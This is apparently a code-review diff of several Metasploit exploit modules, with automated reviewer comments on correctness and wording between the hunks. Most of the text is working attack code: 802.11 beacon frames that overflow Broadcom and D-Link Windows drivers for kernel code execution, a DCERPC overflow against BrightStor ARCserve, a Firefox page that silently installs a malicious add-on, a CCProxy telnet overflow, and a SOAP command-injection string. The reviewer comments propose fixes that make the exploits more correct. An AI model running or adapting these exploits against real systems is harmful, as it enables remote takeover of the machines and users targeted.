||||
'Ret' => 0x804f16eb, # jmp edi
|
||||
'Platform' => 'win',
|
||||
'Payload' =>
|
||||
'Payload' =>
|
||||
{
|
||||
'ExtendedOptions' =>
|
||||
'ExtendedOptions' =>
|
||||
{
|
||||
'Stager' => 'sud_syscall_hook',
|
||||
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
|
||||
|
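Review bot: the first target's comment and name disagree on the kernel build: the comment reads `# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)` while the name reads `'Windows XP SP2 (5.1.2600.2122), bcmwl5.sys 3.50.21.10'`. The `Ret` 0x8066662c and `KiIdleLoopAddress` 0x804dbb27 are build-specific, and the D-Link module in this same change pairs the 2622 comment with the identical addresses, so the name is most likely the typo and should read 5.1.2600.2622. Minor: both the old and new description wording say 'a 802.11 probe response'; 'an 802.11' reads correctly.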
@ -83,13 +92,13 @@ class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote
|
|||
'KiIdleLoopAddress' => 0x804dc0c7,
|
||||
}
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
],
|
||||
|
||||
'DefaultTarget' => 0
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Nov 11 2006'
|
||||
))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']),
|
||||
|
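Review bot: `OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF'])` gives a required option a broadcast default, while the description in this same change says the target MAC must be provided and `create_response` addresses the probe response to `ADDR_DST`. Either drop the default so the framework makes the operator set it, or document that broadcast is an intentional fallback; as written the option is marked required but never prompts.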
@ -99,102 +108,99 @@ class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
open_wifi
|
||||
|
||||
|
||||
stime = Time.now.to_i
|
||||
|
||||
|
||||
print_status("Sending beacons and responses for #{datastore['RUNTIME']} seconds...")
|
||||
|
||||
while (stime + datastore['RUNTIME'].to_i > Time.now.to_i)
|
||||
|
||||
|
||||
while (stime + datastore['RUNTIME'].to_i > Time.now.to_i)
|
||||
|
||||
select(nil, nil, nil, 0.02)
|
||||
wifi.write(create_response)
|
||||
|
||||
select(nil, nil, nil, 0.01)
|
||||
wifi.write(create_beacon)
|
||||
|
||||
|
||||
break if session_created?
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
||||
print_status("Finished sending frames...")
|
||||
end
|
||||
|
||||
|
||||
def create_beacon
|
||||
src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93
|
||||
dst = eton('FF:FF:FF:FF:FF:FF')
|
||||
seq = [Time.now.to_i % 4096].pack('n')
|
||||
|
||||
|
||||
blob = create_frame
|
||||
blob[0,1] = 0x80.chr
|
||||
blob[4,6] = dst
|
||||
blob[10,6] = src
|
||||
blob[16,6] = src
|
||||
blob[22,2] = seq
|
||||
|
||||
|
||||
blob
|
||||
end
|
||||
|
||||
|
||||
def create_response
|
||||
src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93
|
||||
dst = eton(datastore['ADDR_DST'])
|
||||
seq = [Time.now.to_i % 256].pack('n')
|
||||
|
||||
|
||||
blob = create_frame
|
||||
blob[0,1] = 0x50.chr
|
||||
blob[0,1] = 0x50.chr
|
||||
blob[4,6] = dst
|
||||
blob[10,6] = src
|
||||
blob[16,6] = src # bssid field, good idea to set to src.
|
||||
blob[16,6] = src # bssid field, good idea to set to src.
|
||||
blob[22,2] = seq
|
||||
|
||||
|
||||
blob
|
||||
end
|
||||
|
||||
def create_frame
|
||||
"\x80" + # type/subtype
|
||||
"\x00" + # flags
|
||||
"\x00\x00" + # duration
|
||||
"\xff\xff\xff\xff\xff\xff" + # dst
|
||||
"\x00\x00" + # duration
|
||||
eton(datastore['ADDR_DST']) + # dst
|
||||
"\x58\x58\x58\x58\x58\x58" + # src
|
||||
"\x58\x58\x58\x58\x58\x58" + # bssid
|
||||
"\x70\xed" + # sequence number
|
||||
|
||||
|
||||
#
|
||||
# fixed parameters
|
||||
#
|
||||
|
||||
|
||||
# timestamp value
|
||||
Rex::Text.rand_text_alphanumeric(8) +
|
||||
rand_text_alphanumeric(8) +
|
||||
"\x64\x00" + # beacon interval
|
||||
"\x11\x04" + # capability flags
|
||||
|
||||
|
||||
#
|
||||
# tagged parameters
|
||||
#
|
||||
|
||||
|
||||
# ssid tag
|
||||
"\x00" + # tag: SSID parameter set
|
||||
"\x5d" + # len: length is 93 bytes
|
||||
|
||||
|
||||
# jump into the payload
|
||||
"\x89\xf9" + # mov edi, ecx
|
||||
"\x81\xc1\x7b\x00\x00\x00" + # add ecx, 0x7b
|
||||
"\xff\xe1" + # jmp ecx
|
||||
|
||||
|
||||
# padding
|
||||
Rex::Text.rand_text_alphanumeric(79) +
|
||||
|
||||
rand_text_alphanumeric(79) +
|
||||
|
||||
# return address
|
||||
[target.ret].pack('V') +
|
||||
|
||||
|
||||
# vendor specific tag
|
||||
"\xdd" + # wpa
|
||||
"\xff" + # big as we can make it
|
||||
|
||||
|
||||
# the kernel-mode stager
|
||||
payload.encoded
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
# milw0rm.com [2006-11-13]
|
||||
end
|
||||
|
|
|
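Review bot: the sequence-control field is built as `[Time.now.to_i % 4096].pack('n')` in `create_beacon` and `[Time.now.to_i % 256].pack('n')` in `create_response`, then written at `blob[22,2]`. 802.11 stores sequence control little-endian with the fragment number in the low four bits and the sequence number in the upper twelve, so a big-endian pack lands sequence bits in the fragment nibble, and the two helpers also disagree on the modulus. `[(Time.now.to_i % 4096) << 4].pack('v')` in both places gives a well-formed, consistent header; the literal `"\x70\xed"` in `create_frame` is always overwritten and deserves a comment saying so.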
@ -1,57 +1,72 @@
|
|||
##
|
||||
# $Id: dlink_wifi_rates.rb 9670 2010-07-03 03:19:07Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = LowRanking
|
||||
|
||||
class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Lorcon
|
||||
include Exploit::KernelMode
|
||||
include Msf::Exploit::Lorcon2
|
||||
include Msf::Exploit::KernelMode
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'D-Link DWL-G132 Wireless Driver Beacon Rates Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in the A5AGU.SYS driver provided
|
||||
with the D-Link DWL-G132 USB wireless adapter. This stack overflow
|
||||
allows remote code execution in kernel mode. The stack overflow is triggered
|
||||
when a 802.11 Beacon frame is received that contains a long Rates information
|
||||
element. This exploit was tested with version 1.0.1.41 of the
|
||||
A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer
|
||||
versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340
|
||||
adapter and appear to resolve this flaw, but D-Link does not offer an updated
|
||||
driver for the DWL-G132. Since this vulnerability is exploited via beacon frames,
|
||||
all cards within range of the attack will be affected. The tested adapter used
|
||||
a MAC address in the range of 00:11:95:f2:XX:XX.
|
||||
|
||||
Vulnerable clients will need to have their card in a non-associated state
|
||||
for this exploit to work. The easiest way to reproduce this bug is by starting
|
||||
the exploit and then accessing the Windows wireless network browser and
|
||||
forcing it to refresh.
|
||||
|
||||
D-Link was NOT contacted about this flaw. A search of the SecurityFocus
|
||||
database indicates that D-Link has not provided an official patch or
|
||||
solution for any of the seven flaws listed at the time of writing:
|
||||
(BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689).
|
||||
|
||||
This module depends on the Lorcon library and only works on the Linux platform
|
||||
with a supported wireless card. Please see the Ruby Lorcon documentation
|
||||
(external/ruby-lorcon/README) for more information.
|
||||
This module exploits a stack buffer overflow in the A5AGU.SYS driver provided
|
||||
with the D-Link DWL-G132 USB wireless adapter. This stack buffer overflow
|
||||
allows remote code execution in kernel mode. The stack buffer overflow is triggered
|
||||
when a 802.11 Beacon frame is received that contains a long Rates information
|
||||
element. This exploit was tested with version 1.0.1.41 of the
|
||||
A5AGU.SYS driver and a D-Link DWL-G132 USB adapter (HW: A2, FW: 1.02). Newer
|
||||
versions of the A5AGU.SYS driver are provided with the D-Link WUA-2340
|
||||
adapter and appear to resolve this flaw, but D-Link does not offer an updated
|
||||
driver for the DWL-G132. Since this vulnerability is exploited via beacon frames,
|
||||
all cards within range of the attack will be affected. The tested adapter used
|
||||
a MAC address in the range of 00:11:95:f2:XX:XX.
|
||||
|
||||
Vulnerable clients will need to have their card in a non-associated state
|
||||
for this exploit to work. The easiest way to reproduce this bug is by starting
|
||||
the exploit and then accessing the Windows wireless network browser and
|
||||
forcing it to refresh.
|
||||
|
||||
D-Link was NOT contacted about this flaw. A search of the SecurityFocus
|
||||
database indicates that D-Link has not provided an official patch or
|
||||
solution for any of the seven flaws listed at the time of writing:
|
||||
(BIDs 13679, 16621, 16690, 18168, 18299, 19006, and 20689).
|
||||
|
||||
As of November 17th, 2006, D-Link has fixed the flaw it the latest version of the
|
||||
DWL-G132 driver (v1.21).
|
||||
|
||||
This module depends on the Lorcon2 library and only works on the Linux platform
|
||||
with a supported wireless card. Please see the Ruby Lorcon2 documentation
|
||||
(external/ruby-lorcon/README) for more information.
|
||||
},
|
||||
|
||||
'Authors' =>
|
||||
'Author' =>
|
||||
[
|
||||
'hdm', # discovery, exploit dev
|
||||
'skape', # windows kernel ninjitsu
|
||||
'Johnny Cache <johnnycsh [at] 80211mercenary.net>' # making all of this possible
|
||||
'Johnny Cache <johnnycsh [at] 802.11mercenary.net>' # making all of this possible
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 3583 $',
|
||||
'Version' => '$Revision: 9670 $',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2006-6055'],
|
||||
['OSVDB', '30296'],
|
||||
['URL', 'http://projects.info-pull.com/mokb/MOKB-13-11-2006.html'],
|
||||
['URL', 'ftp://ftp.dlink.com/Wireless/dwlg132/Driver/DWLG132_driver_102.zip'],
|
||||
],
|
||||
'Privileged' => true,
|
||||
|
||||
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
|
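Review bot: the new description paragraph has a typo, `fixed the flaw it the latest version of the DWL-G132 driver (v1.21)` should read `in the latest version`, and it now contradicts the retained paragraph above it that says D-Link has not provided an official patch or solution. Rework the 'D-Link was NOT contacted' paragraph as history, or drop the 'has not provided' sentence, so the module text gives one answer on patch status. Minor: 'a 802.11 Beacon frame' should be 'an 802.11'.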
@ -63,7 +78,7 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
|
|||
'Space' => 1000
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
# Windows XP SP2 with the latest updates
|
||||
# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
|
||||
|
@ -71,9 +86,9 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
|
|||
{
|
||||
'Ret' => 0x8066662c, # jmp edi
|
||||
'Platform' => 'win',
|
||||
'Payload' =>
|
||||
'Payload' =>
|
||||
{
|
||||
'ExtendedOptions' =>
|
||||
'ExtendedOptions' =>
|
||||
{
|
||||
'Stager' => 'sud_syscall_hook',
|
||||
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
|
||||
|
@ -81,18 +96,18 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
|
|||
'KiIdleLoopAddress' => 0x804dbb27,
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
],
|
||||
|
||||
|
||||
# Windows XP SP2 install media, no patches
|
||||
# 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
|
||||
[ 'Windows XP SP2 (5.1.2600.2180), A5AGU.sys 1.0.1.41',
|
||||
{
|
||||
'Ret' => 0x804f16eb, # jmp edi
|
||||
'Platform' => 'win',
|
||||
'Payload' =>
|
||||
'Payload' =>
|
||||
{
|
||||
'ExtendedOptions' =>
|
||||
'ExtendedOptions' =>
|
||||
{
|
||||
'Stager' => 'sud_syscall_hook',
|
||||
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
|
||||
|
@ -100,72 +115,73 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
|
|||
'KiIdleLoopAddress' => 0x804dc0c7,
|
||||
}
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Nov 13 2006'))
|
||||
|
||||
|
||||
'DefaultTarget' => 0
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('ADDR_DST', [ true, "The MAC address to send this to",'FF:FF:FF:FF:FF:FF']),
|
||||
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
open_wifi
|
||||
|
||||
|
||||
stime = Time.now.to_i
|
||||
rtime = datastore['RUNTIME'].to_i
|
||||
count = 0
|
||||
|
||||
|
||||
print_status("Sending exploit beacons for #{datastore['RUNTIME']} seconds...")
|
||||
while (stime + rtime > Time.now.to_i)
|
||||
while (stime + rtime > Time.now.to_i)
|
||||
wifi.write(create_beacon)
|
||||
select(nil, nil, nil, 0.10) if (count % 100 == 0)
|
||||
|
||||
|
||||
count += 1
|
||||
|
||||
|
||||
# Exit if we get a session
|
||||
break if session_created?
|
||||
end
|
||||
|
||||
|
||||
print_status("Completed sending beacons.")
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# The following research was provided by Gil Dabah of ZERT
|
||||
#
|
||||
# The long rates field bug can be triggered three different ways (at least):
|
||||
# 1) Send a single rates IE with valid rates up front and long data
|
||||
# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data (thanks gil!)
|
||||
# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data
|
||||
# 3) Send two IE rates fields, with the second one containing the long data (this exploit)
|
||||
#
|
||||
|
||||
def create_beacon
|
||||
|
||||
ssid = Rex::Text.rand_text_alphanumeric(6)
|
||||
bssid = ("\x00" * 2) + Rex::Text.rand_text(4)
|
||||
ssid = rand_text_alphanumeric(6)
|
||||
bssid = ("\x00" * 2) + rand_text(4)
|
||||
src = ("\x90" * 4) + "\xeb\x2b"
|
||||
seq = [rand(255)].pack('n')
|
||||
|
||||
buff = Rex::Text.rand_text(75)
|
||||
buff = rand_text(75)
|
||||
buff[0, 2] = "\xeb\x49"
|
||||
buff[71, 4] = [target.ret].pack('V')
|
||||
|
||||
|
||||
frame =
|
||||
"\x80" + # type/subtype
|
||||
"\x00" + # flags
|
||||
"\x00\x00" + # duration
|
||||
"\xff\xff\xff\xff\xff\xff" + # dst
|
||||
"\x00\x00" + # duration
|
||||
eton(datastore['ADDR_DST']) + # dst
|
||||
src + # src
|
||||
bssid + # bssid
|
||||
seq + # seq
|
||||
Rex::Text.rand_text(8) + # timestamp value
|
||||
bssid + # bssid
|
||||
seq + # seq
|
||||
rand_text(8) + # timestamp value
|
||||
"\x64\x00" + # beacon interval
|
||||
"\x00\x05" + # capability flags
|
||||
|
||||
|
||||
# ssid tag
|
||||
"\x00" + ssid.length.chr + ssid +
|
||||
|
||||
|
@ -176,14 +192,11 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
|
|||
"\x03" + "\x01" + channel.chr +
|
||||
|
||||
# eip was his name-o
|
||||
"\x01" + buff.length.chr + buff +
|
||||
"\x01" + buff.length.chr + buff +
|
||||
|
||||
payload.encoded
|
||||
|
||||
|
||||
return frame
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
# milw0rm.com [2006-11-13]
|
||||
|
|
|
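Review bot: the comment block credits Gil Dabah of ZERT for the rates-IE research (and the `(thanks gil!)` aside is being dropped from item 2), but the `'Author'` list earlier in this file names only hdm, skape and Johnny Cache. Keep the credit discoverable by adding him to `'Author'` or as a `'References'` entry rather than only in a comment. Also, `select(nil, nil, nil, 0.10) if (count % 100 == 0)` pauses before the first beacon because `count` starts at 0; incrementing before the check, or testing `count > 0`, avoids an idle 100 ms before anything is sent.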
@ -128,9 +128,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# due to the fake activation). But this line also will kill other cscript
|
||||
# legit processes which could be running on the target host. Because of it
|
||||
# the exploit has a Manual ranking
|
||||
command = ""127.0.0.1 && "
|
||||
command << cmd.gsub(/&/, "&")
|
||||
command << " && taskkill /F /IM cscript.exe ""
|
||||
command = ""127.0.0.1 && "
|
||||
command << cmd.gsub(/&/, "&")
|
||||
command << " && taskkill /F /IM cscript.exe ""
|
||||
|
||||
res = send_soap_request("OPCACTIVATE", "omHost", command)
|
||||
|
||||
|
|
|
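Review bot: as displayed, `command = ""127.0.0.1 && "` and the closing `" && taskkill /F /IM cscript.exe ""` are not valid Ruby (unbalanced string literals), and `cmd.gsub(/&/, "&")` is a no-op. This looks like `&quot;` and `&amp;` entities decoded during rendering; please confirm the committed source carries the escaped forms (quoting for the SOAP body and `&` to `&amp;`), since the comment above explains why the `taskkill` is there but nothing explains the escaping. If the source really reads this way, the module will not load.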
@ -1,92 +0,0 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
Rank = AverageRanking
|
||||
|
||||
include Msf::Exploit::Remote::DCERPC
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup
|
||||
r11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow
|
||||
the buffer and execute arbitrary code.
|
||||
},
|
||||
'Author' => [ 'MC' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '68330'],
|
||||
[ 'URL', 'http://www.metasploit.com/users/mc' ],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 500,
|
||||
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'BrightStor ARCserve r11.5/Windows 2003', { 'Ret' => 0x28eb6493 } ],
|
||||
],
|
||||
'DisclosureDate' => 'Oct 4 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options([ Opt::RPORT(6502) ], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
connect
|
||||
|
||||
handle = dcerpc_handle('62b93df0-8b02-11ce-876c-00805f842837', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
|
||||
print_status("Binding to #{handle} ...")
|
||||
|
||||
dcerpc_bind(handle)
|
||||
print_status("Bound to #{handle} ...")
|
||||
|
||||
request = "\x00\x04\x08\x0c\x05\x00\x00\x00\x00\x00"
|
||||
request << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||
|
||||
dcerpc.call(0x2B, request)
|
||||
|
||||
sploit = NDR.long(4)
|
||||
sploit << NDR.string(rand_text_alpha_upper(1002) + [target.ret].pack('V') + payload.encoded + "\x00")
|
||||
|
||||
print_status("Trying target #{target.name}...")
|
||||
|
||||
begin
|
||||
dcerpc_call(0x8A, sploit)
|
||||
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
|
||||
end
|
||||
|
||||
handler
|
||||
disconnect
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
=begin
|
||||
/* opcode: 0x8A, address: 0x100707D0 */
|
||||
|
||||
long sub_100707D0 (
|
||||
[in] handle_t arg_1,
|
||||
[in] long arg_2,
|
||||
[in][ref][string] char * arg_3
|
||||
);
|
||||
=end
|
|
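Review bot: this is a whole-file removal and the hunk leaves no pointer to where the BrightStor ARCserve Tape Engine opcode 0x8A coverage goes (OSVDB 68330, interface 62b93df0-8b02-11ce-876c-00805f842837, RPORT 6502). If it is a deduplication against another module, name the replacement in the commit message; if it is being dropped outright, say why, since the `=begin`/`=end` IDL note for `sub_100707D0` is the only interface description recorded here for that opcode.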
@ -1,116 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::BrowserExploitServer
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::Remote::FirefoxAddonGenerator
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Firefox 5.0 - 15.0.1 __exposedProps__ XCS Code Execution',
|
||||
'Description' => %q{
|
||||
On versions of Firefox from 5.0 to 15.0.1, the InstallTrigger global, when given
|
||||
invalid input, would throw an exception that did not have an __exposedProps__
|
||||
property set. By re-setting this property on the exception object's prototype,
|
||||
the chrome-based defineProperty method is made available.
|
||||
|
||||
With the defineProperty method, functions belonging to window and document can be
|
||||
overriden with a function that gets called from chrome-privileged context. From here,
|
||||
another vulnerability in the crypto.generateCRMFRequest function is used to "peek"
|
||||
into the context's private scope. Since the window does not have a chrome:// URL,
|
||||
the insecure parts of Components.classes are not available, so instead the AddonManager
|
||||
API is invoked to silently install a malicious plugin.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [
|
||||
'Mariusz Mlynski', # discovered CVE-2012-3993
|
||||
'moz_bug_r_a4', # discovered CVE-2013-1710
|
||||
'joev' # metasploit module
|
||||
],
|
||||
'DisclosureDate' => "Aug 6 2013",
|
||||
'References' => [
|
||||
['CVE', '2012-3993'], # used to install function that gets called from chrome:// (ff<15)
|
||||
['OSVDB', '86111'],
|
||||
['URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=768101'],
|
||||
['CVE', '2013-1710'], # used to peek into privileged caller's closure (ff<23)
|
||||
['OSVDB', '96019']
|
||||
],
|
||||
'BrowserRequirements' => {
|
||||
:source => 'script',
|
||||
:ua_name => HttpClients::FF,
|
||||
:ua_ver => lambda { |ver| ver.to_i.between?(5, 15) }
|
||||
}
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", '' ] )
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def on_request_exploit(cli, request, target_info)
|
||||
if request.uri.match(/\.xpi$/i)
|
||||
print_status("Sending the malicious addon")
|
||||
send_response(cli, generate_addon_xpi.pack, { 'Content-Type' => 'application/x-xpinstall' })
|
||||
else
|
||||
print_status("Sending HTML")
|
||||
send_response_html(cli, generate_html(target_info))
|
||||
end
|
||||
end
|
||||
|
||||
def generate_html(target_info)
|
||||
injection = if target_info[:ua_ver].to_i == 15
|
||||
"Function.prototype.call.call(p.__defineGetter__,obj,key,runme);"
|
||||
else
|
||||
"p2.constructor.defineProperty(obj,key,{get:runme});"
|
||||
end
|
||||
|
||||
%Q|
|
||||
<html>
|
||||
<body>
|
||||
#{datastore['CONTENT']}
|
||||
<div id='payload' style='display:none'>
|
||||
if (!window.done){
|
||||
window.AddonManager.getInstallForURL(
|
||||
'#{get_module_uri}/addon.xpi',
|
||||
function(install) { install.install() },
|
||||
'application/x-xpinstall'
|
||||
);
|
||||
window.done = true;
|
||||
}
|
||||
</div>
|
||||
<script>
|
||||
try{InstallTrigger.install(0)}catch(e){p=e;};
|
||||
var p2=Object.getPrototypeOf(Object.getPrototypeOf(p));
|
||||
p2.__exposedProps__={
|
||||
constructor:'rw',
|
||||
prototype:'rw',
|
||||
defineProperty:'rw',
|
||||
__exposedProps__:'rw'
|
||||
};
|
||||
var s = document.querySelector('#payload').innerHTML;
|
||||
var q = false;
|
||||
var register = function(obj,key) {
|
||||
var runme = function(){
|
||||
if (q) return;
|
||||
q = true;
|
||||
window.crypto.generateCRMFRequest("CN=Me", "foo", "bar", null, s, 384, null, "rsa-ex");
|
||||
};
|
||||
try {
|
||||
#{injection}
|
||||
} catch (e) {}
|
||||
};
|
||||
for (var i in window) register(window, i);
|
||||
for (var i in document) register(document, i);
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
|
|
||||
end
|
||||
end
|
|
@ -1,110 +1,82 @@
|
|||
##
|
||||
# $Id$
|
||||
# $Id: ccproxy_telnet_ping.rb 9179 2010-04-30 08:40:19Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = AverageRanking
|
||||
|
||||
class Exploits::Windows::Proxy::CCProxy_Telnet_Ping < Msf::Exploit::Remote
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'CCProxy <= v6.2 Telnet Proxy Ping Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet service.
|
||||
The stack is overwritten when sending an overly long address to the 'ping' command.
|
||||
This module exploits the YoungZSoft CCProxy <= v6.2 suite
|
||||
Telnet service. The stack is overwritten when sending an overly
|
||||
long address to the 'ping' command.
|
||||
},
|
||||
'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ],
|
||||
'Arch' => [ ARCH_X86 ],
|
||||
'Arch' => [ ARCH_X86 ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'Version' => '$Revision: 9179 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'BID', '11666 ' ],
|
||||
[ 'CVE', '2004-2416' ],
|
||||
[ 'MIL', '621' ],
|
||||
[ 'OSVDB', '11593' ],
|
||||
],
|
||||
[
|
||||
[ 'CVE', '2004-2416' ],
|
||||
[ 'OSVDB', '11593' ],
|
||||
[ 'BID', '11666 ' ],
|
||||
[ 'URL', 'http://milw0rm.com/exploits/621' ],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
{
|
||||
'Space' => 1012,
|
||||
'BadChars' => "\x00\x07\x08\x0a\x0d",
|
||||
'BadChars' => "\x00\x07\x08\x0a\x0d\x20",
|
||||
},
|
||||
'Platform' => ['win'],
|
||||
'Targets' =>
|
||||
[
|
||||
# Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.
|
||||
[
|
||||
'Windows 2000 Pro All - English',
|
||||
{
|
||||
'Ret' => 0x75023411, # call esi ws2help.dll
|
||||
}
|
||||
# Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.
|
||||
[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll
|
||||
[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll
|
||||
[ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll
|
||||
[ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll
|
||||
[ 'Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll
|
||||
],
|
||||
[
|
||||
'Windows 2000 Pro All - Italian',
|
||||
{
|
||||
'Ret' => 0x74fd2b81, # call esi ws2help.dll
|
||||
}
|
||||
],
|
||||
[
|
||||
'Windows 2000 Pro All - French',
|
||||
{
|
||||
'Ret' => 0x74fa2b22, # call esi ws2help.dll
|
||||
}
|
||||
],
|
||||
[
|
||||
'Windows XP SP0/1 - English',
|
||||
{
|
||||
'Ret' => 0x71aa1a97, # call esi ws2help.dll
|
||||
}
|
||||
],
|
||||
[
|
||||
'Windows XP SP2 - English',
|
||||
{
|
||||
